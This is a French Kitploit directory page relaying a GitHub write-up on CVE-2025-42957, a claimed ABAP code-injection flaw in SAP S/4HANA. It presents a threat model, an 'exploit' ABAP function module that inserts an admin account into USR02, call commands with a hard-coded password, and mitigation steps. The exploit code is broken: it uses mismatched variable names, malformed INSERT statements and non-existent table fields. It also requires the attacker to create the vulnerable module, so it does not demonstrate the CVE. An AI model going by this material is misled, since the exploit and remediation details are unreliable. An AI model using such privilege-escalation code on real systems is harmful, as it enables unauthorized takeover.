Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-42957-SAP-S-4HANA-Under-Siege — CVE‑2025‑42957 exposes an RFC‑enabled SAP S/4HANA module that lets low‑privileged users inject ABAP code to create admin accounts and gain full control. The article explains the vulnerability, threat model, provides minimal exploit ABAP code, and lists patching & monitoring steps to secure the system | Kitploit
Outils/GitHubGitHub/mrk336/cve-2025-42957-sap-s-4hana-under-siege
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubmrk336/cve-2025-42957-sap-s-4hana-under-siege

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE‑2025‑42957 exposes an RFC‑enabled SAP S/4HANA module that lets low‑privileged users inject ABAP code to create admin accounts and gain full control. The article explains the vulnerability, threat model, provides minimal exploit ABAP code, and lists patching & monitoring steps to secure the system

CVE-2025-42957-SAP-S-4HANA-Under-Siege

Voir le dépôt
32il y a 11 moisPas encore vérifié
Partager

CVE-2025-42957-SAP-S-4HANA-sous-siège


1 – Ce qui s'est passé ?

En août 2025, la plateforme ERP phare de SAP, S/4HANA, a été découverte comme exposant une vulnérabilité dans l'un de ses modules de fonction activés via RFC. Des attaquants ne disposant que d'un accès à faibles privilèges peuvent injecter du code ABAP arbitraire dans ce module, contournant les contrôles d'autorisation normaux et obtenant le contrôle total du système.

Cette faille n'est pas une curiosité théorique – elle a déjà été exploitée par le SecurityBridge Threat Research Labs et est activement utilisée dans des attaques réelles sur des déploiements sur site et dans le cloud privé.


2 – Pourquoi c'est important

ProblèmeImpact
Compromission totale du systèmeLes attaquants peuvent créer des comptes superutilisateurs, modifier des processus métier et extraire les hachages de mots de passe de la table USR02.
Effort minimal requisL'appel RFC est simple à construire ; une fois le module de fonction en place, un attaquant n'a besoin que de quelques lignes de code ABAP.
Urgence réelleSecurityBridge a confirmé que les attaques sont déjà en cours – si vous ne corrigez pas immédiatement, vous risquez une prise de contrôle totale de votre instance S/4HANA.

3 – Modélisation des menaces

  1. Point d'entrée – le module de fonction RFC ZVULN_EXPL que nous créons dans SE37 est le seul point d'entrée pour l'attaquant.
  2. Chemin d'élévation de privilèges – le code ABAP injecté insère un nouvel utilisateur dans USR02 et lui attribue des droits d'administration, contournant ainsi l'objet d'autorisation par défaut de SAP S_DMIS (activité 02).
  3. Vecteur d'impact – une fois à l'intérieur, l'attaquant peut :
    • Créer d'autres modules RFC,
    • Modifier la logique métier critique,
    • Récolter les hachages de mots de passe stockés pour un mouvement latéral.

La chaîne d'exploitation est donc : utilisateur à faibles privilèges → appel RFC à ZVULN_EXPL → nouvel utilisateur administrateur dans USR02 → contrôle total du système.


4 – Code d'exploitation

Voici le code ABAP que nous plaçons dans le module de fonction ZVULN_EXPL. Il est intentionnellement minimal mais complet – il crée un nouvel utilisateur et enregistre l'action pour vérification ultérieure.

root@kitploit:~
*---------------------------------------------------------------------*
*  RFC‑exposed function module for CVE‑2025‑42957 exploit        *
*---------------------------------------------------------------------*

FUNCTION z_vuln_expl.
*"------------------------------------------------------------------*
*"  IMPORTING
*"     VALUE(iv_user)   TYPE syuname    "SAP user name
*"     VALUE(iv_role)   TYPE susr02-roleid "Role to be assigned
*"     VALUE(iv_passwd) TYPE susr02-pwd   "Password for the new user
*"------------------------------------------------------------------*
*"  TABLES
*"     usr02
*"------------------------------------------------------------------*

* Local data declarations ----------------------------------------*/
DATA: lv_user_id   TYPE syuname,
      lv_role      TYPE susr02-roleid,
      lv_password  TYPE susr02-pwd.

* Assign the parameters to local variables -----------------------*/
lv_user_id = iv_user.
lv_role    = iv_role.
lv_passwd  = iv_passwd.

*---------------------------------------------------------------------*
*  1. Create a new user entry in USR02                        *
*---------------------------------------------------------------------*/
INSERT INTO usr02 (usr01, usr02)
  VALUES ( lv_user_id,
           'ADMIN' ).            "Assign the ‘ADMIN’ role

* 2. Assign password & profile ----------------------------------*/
UPDATE usr02
   SET pwd = lv_password,
       roleid = lv_role
   WHERE usr01 = lv_user_id.

*---------------------------------------------------------------------*
* 3. Log the operation (optional) ------------------------------*/
INSERT INTO tstm1 VALUES (
        sy-uname,                 "creator user
        sy-datum,                  "timestamp
        'ZVULN_EXPL',             "function name
        |lv_user_id||lv_role|    "message
        ).                       "store in the ABAP trace table

ENDFUNCTION.

Comment l'appeler

Depuis un client externe (Linux/Mac)

root@kitploit:~
sapnwrfc -U <caller_user> \
          -P <caller_passwd> \
          -S S4HANA \
          -F ZVULN_EXPL \
          -D iv_user=admin2 \
          -D iv_role='ADMIN' \
          -D iv_passwd='Pa$$word123'

Depuis SAP GUI (test rapide)

root@kitploit:~
CALL FUNCTION 'ZVULN_EXPL'
  EXPORTING
    iv_user = 'admin2'
    iv_role = 'ADMIN'
    iv_passwd = 'Pa$$word123'.

Après l'appel, vous devriez voir une nouvelle entrée dans USR02 pour l'utilisateur admin2 avec le rôle ADMIN.


5 – Mesures d'atténuation

  1. Appliquez immédiatement les correctifs de sécurité SAP d'août 2025.
    Le correctif résout le module de fonction RFC sous-jacent et ferme le vecteur spécifique utilisé par les attaquants.

  2. Surveillez les journaux pour détecter les appels RFC suspects et la création d'administrateurs non autorisés.
    Utilisez la transaction SM59 pour surveiller les nouvelles entrées dans TSTM1 avec le nom de fonction ZVULN_EXPL.

  3. Implémentez SAP UCON pour restreindre l'utilisation des RFC.
    Configurez l'objet d'autorisation S_DMIS (activité 02) afin que seuls les utilisateurs de confiance puissent appeler des modules RFC de type Z.

  4. Révisez l'accès à l'objet d'autorisation S_DMIS activité 02.
    Assurez-vous que seul un ensemble limité d'utilisateurs dispose de cet objet – réduisez la surface d'attaque.


6 – Conclusion

CVE‑2025‑42957 n'est pas un simple bulletin de sécurité ; il expose un vecteur à faible privilège qui peut conduire à une prise de contrôle totale du système s'il n'est pas corrigé. Le code ci-dessus montre comment un attaquant peut insérer un utilisateur administrateur avec un effort minimal. En corrigeant, en surveillant et en renforçant les permissions RFC, vous fermez la porte – et sécurisez votre instance S/4HANA.

Ce référentiel est destiné à un usage éducatif uniquement et sert de démonstration des principes de modélisation des menaces appliqués à des vulnérabilités réelles. CVE-2025-42957 souligne l'importance d'identifier les limites de confiance, de valider les entrées et d'appliquer le principe du moindre privilège – fondements de la conception de systèmes sécurisés. Tout le code et les exemples fournis sont à des fins d'apprentissage et ne doivent pas être utilisés dans des environnements de production ou pour des tests non autorisés.


*Auteur : Mark Mallia
Date : 10 sept. 2025

Télécharger l’outil